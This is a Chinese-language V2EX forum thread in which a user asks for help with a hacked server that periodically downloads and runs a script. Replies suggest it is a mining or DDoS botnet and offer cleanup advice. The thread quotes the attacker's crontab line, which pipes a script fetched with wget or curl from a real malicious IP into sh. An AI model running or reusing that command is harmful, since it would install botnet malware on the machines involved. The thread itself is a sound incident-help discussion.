V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
rwecho
V2EX  ›  Linux

一个双显卡服务器被入侵了,他会定时从下载脚本并执行

  •  
  •   rwecho · 2021-07-06 12:54:55 +08:00 · 4051 次点击
    这是一个创建于 1236 天前的主题,其中的信息可能已经有所发展或是发生改变。
    http://185.150.117.29/x/b

    帮忙分析下这些脚本是干什么的?目前看显卡并没有运行,而是定时占用大量带宽。
    15 条回复    2021-07-07 13:57:51 +08:00
    virusdefender
        1
    virusdefender  
       2021-07-06 13:06:26 +08:00
    这种一般都是挖矿
    rwecho
        2
    rwecho  
    OP
       2021-07-06 13:07:56 +08:00
    15 * * * * wget http://185.150.117.29/x/b -O- | sh || curl http://185.150.117.29/x/b | sh

    它在电脑里面创建了一个用户名为:ps
    然后里面有一个 crontab 命令
    longbow0
        3
    longbow0  
       2021-07-06 13:21:13 +08:00
    主要是从 185.150.117.29 下载适配了不同硬件版本的木马 bot.*

    其中,bot.x86 介绍在 https://s.tencent.com/research/report/1101.html
    CaffreySun
        4
    CaffreySun  
       2021-07-06 13:39:05 +08:00
    这个脚步比较简单,就是“感染”你的服务器,并且创建定时任务重复“感染”。
    至于他“感染”你的服务做什么,得看他执行的那些“bot”开头的程序了,找大佬反编译分析一下。
    或许用来挖坑。
    或许用来执行网络攻击。
    wat4me
        5
    wat4me  
       2021-07-06 16:11:09 +08:00
    Aresrun
        6
    Aresrun  
       2021-07-06 16:27:19 +08:00
    我之前也被入侵了。服务器上没啥东西,就重装了系统
    lopetver
        7
    lopetver  
       2021-07-06 16:34:37 +08:00
    @rwecho 认真的吗

    这只是一个定时下载的任务而已啊,哪里有“它在电脑里面创建了一个用户名为:ps
    然后里面有一个 crontab 命令” 这些操作
    missz
        8
    missz  
       2021-07-06 17:10:59 +08:00
    把服务器做为肉鸡,用来 ddos,所以会时不时带宽拉满
    no1xsyzy
        9
    no1xsyzy  
       2021-07-06 19:00:09 +08:00
    命令行 HTTP 客户端竟然是 wget 和 curl 而没有 lynx
    我记得哪个 Unix 环境是默认只有 lynx 的来着?
    hlobo
        10
    hlobo  
       2021-07-06 19:05:57 +08:00 via iPhone
    攻击它下载脚本的服务器
    changchong
        11
    changchong  
       2021-07-06 22:42:41 +08:00
    修改端口怎么样
    yogogo
        12
    yogogo  
       2021-07-07 08:09:40 +08:00
    前几天我一台也是给挂挖矿的,后来就关端口,开 selinux,就好了
    rwecho
        13
    rwecho  
    OP
       2021-07-07 09:32:39 +08:00 via Android
    已经把下载的脚本清空了,目前没看到有异常情况,之前 root 密码太弱了
    lanshee
        14
    lanshee  
       2021-07-07 09:58:50 +08:00
    @rwecho #23 清空是治标不治本的.
    guanyin8cnq12
        15
    guanyin8cnq12  
       2021-07-07 13:57:51 +08:00
    一个字,格
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2657 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 34ms · UTC 03:24 · PVG 11:24 · LAX 19:24 · JFK 22:24
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.